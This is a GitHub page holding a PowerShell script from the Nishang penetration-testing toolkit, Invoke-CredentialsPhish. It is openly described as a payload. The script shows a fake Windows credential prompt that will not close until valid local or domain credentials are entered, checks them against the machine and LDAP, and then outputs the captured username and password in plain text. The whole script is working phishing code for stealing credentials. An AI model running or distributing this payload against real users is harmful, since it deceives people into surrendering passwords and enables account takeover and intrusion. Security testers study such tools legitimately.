Skip to content
Permalink
Branch: master
Find file Copy path
Find file Copy path
Fetching contributors…
Cannot retrieve contributors at this time
47 lines (39 sloc) 1.57 KB
function Invoke-CredentialsPhish
{
<#
.SYNOPSIS
Nishang script which opens a user credential prompt.
.DESCRIPTION
This payload opens a prompt which asks for user credentials and does not go away till valid local or domain credentials are entered in the prompt.
.EXAMPLE
PS > Invoke-CredentialsPhish
.LINK
http://labofapenetrationtester.blogspot.com/
https://github.com/samratashok/nishang
#>
[CmdletBinding()]
Param ()
$ErrorActionPreference="SilentlyContinue"
Add-Type -assemblyname system.DirectoryServices.accountmanagement
$DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine)
$domainDN = "LDAP://" + ([ADSI]"").distinguishedName
while($true)
{
$credential = $host.ui.PromptForCredential("Credentials are required to perform this operation", "Please enter your user name and password.", "", "")
if($credential)
{
$creds = $credential.GetNetworkCredential()
[String]$user = $creds.username
[String]$pass = $creds.password
[String]$domain = $creds.domain
$authlocal = $DS.ValidateCredentials($user, $pass)
$authdomain = New-Object System.DirectoryServices.DirectoryEntry($domainDN,$user,$pass)
if(($authlocal -eq $true) -or ($authdomain.name -ne $null))
{
$output = "Username: " + $user + " Password: " + $pass + " Domain:" + $domain + " Domain:"+ $authdomain.name
$output
break
}
}
}
}
You can’t perform that action at this time.